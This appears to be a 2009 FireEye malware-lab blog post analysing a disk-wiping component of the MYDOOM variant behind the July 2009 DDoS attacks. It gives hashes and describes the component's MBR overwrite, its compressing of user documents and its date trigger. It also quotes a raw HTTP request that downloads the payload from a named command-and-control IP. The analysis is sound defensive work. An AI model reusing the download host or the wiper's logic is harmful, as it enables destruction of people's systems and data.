DDOS Madness Continued...

The DDOS attacks which started around July 4th 2009 and paralyzed some important US and South Korean web sites have come to an end, but the madness behind these attacks is not quite finished yet.

The MYDOOM variant (msiexec1.exe: 0f394734c65d44915060b36a0b1a972d) which initially downloaded a DDOS component has recently been seen to download another component (wversion.exe: f5c6b935e47b6a8da4c5337f8dc84f76) whose sole purpose is to permanently damage the infected systems hard drives. This hard drive killer component acts like a time bomb which will start triggering from July 10th onwards. Sadly it means that today, on July 11th, all those infected pcs which were up and running yesterday are already damaged.

 

 

 

How does this damage occur? The time based execution of wversion.exe is controlled by another component (mstimer.dll: 93322e3614babd2f36131d604fb42905). mstimer.dll gets installed on the victim PC as an NT service with the name 'MS Timer Service".  This service keeps checking the current system date, and once the current date becomes the 10th of July or higher, it executes 'wversion.exe'.  This killer component tries to overwrite the starting sectors of each physical drive with junk bytes. This also erases the MBR (Master Boot Record) making hard disk useless for further use. These junk bytes are not completely junk but also contain a small message for the American people. It starts with a string "Memory of the Independence Day" followed by the junk character 'U'. This is how a physical drive looks like afterward:


Indpnc_day

Here is how this deadly routine looks like:

Destroy_drives 

It is not the end after destroying Boot sector of all physical drives it goes for the destruction Plan B.  Plan B says to search for user documents on all fixed media ( hard drive(s) or flash drive) having one of 37 extensions like .doc, .pdf, .zip .ppt, etc and make them password protected using zip compression.  A file named abc.doc  will get converted into abc.doc.gz. So an attempt to recover data by restoring the Master or Volume boot records will not be enough.

Gz_protect

Sequence of these actions is as follows:

PLan A: Junk overwrite first 512 bytes of each physical drive on the system. It will successfully destroy the MBR and VBRs (Volume Boot Records) making next reboot impossible.

Plan B: Encrypt  or rather compress User document files present on all the fixed media (A: to Z:)

and after it

Plan A1: Junk overwrite the 1st 1 MB of each physical drive on the system.

Although the execution of Plan A and B should be enough to damage the infected system, the code repeats Plan A1. It's kind of like shooting a dead body.  But there is good news as well, wmcfg.exe has a dependency over VS 2005 run time libraries like msvcr90.dll. These libraries do not come by default with the Windows installation but might be installed by third party applications. The absence of these libraries will fail the execution of wmcfg and hence mstimer.dll and the killer component.

Mscfg_fail

 

Another interesting detail is that currently one of the CnCs serving this killer component is located in the US.

 

GET /flash.gif HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 75.151.32.182
Connection: Keep-Alive

where flash.gif is the malware executable wrapped inside a JPEG header.

An IP WHOIS for this cnc reveals:

atif@dev--- {~} whois 75.151.32.182

Comcast Business Communications, Inc. CBC-CM-5 (NET-75-144-0-0-1)
                                  75.144.0.0 - 75.151.255.255
Comcast Business Communications, Inc. CBC-NAPLES-13 (NET-75-151-32-0-1)
                                  75.151.32.0 - 75.151.47.255

I am not positive but it looks to me like a compromised host now serving as the CnC.

 

Another interesting thing to note here is that there are two completely different versions of wversion.exe. There is one (04a3552a78ed2f8dc8dc9a77ee9eb281) which is extracted by wcfg.exe (1cba81fea0f34511c026e77cfa1f0ef6) along with mstimer.dll from its resource section.  Whereas the hard drive killer wversion.exe is downloaded by the mstimer.dll in the form of flash.gif afterwards, and overwrites the old executable.

This old wversion.exe has logic to uninstall the "Windows Timer Service" basically causing the malware to remove itself.  So if there were not an update via the flash.gif file downloaded later on, the results could have been very different.  Instead of destroying the system drives, the malware would have destroyed itself on the 10th of July. At the last moment why did they change their plan?  Maybe worldwide reaction against these attacks really frustrated these guys and they went for the extreme act of killing the infected machines. I can only speculate...

One thing for sure is that the motives behind such attacks could not be purely financial.  Otherwise why would these criminals want to loose thousands of zombies by intentionally trashing them?  I can certainly sense some political motives behind such brutal attacks. The guys behind these attacks are still unknown. There are some rumors that North Korea is involved in these attacks but I think Its not a very clever approach to blame a particular entity without any solid evidence.

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM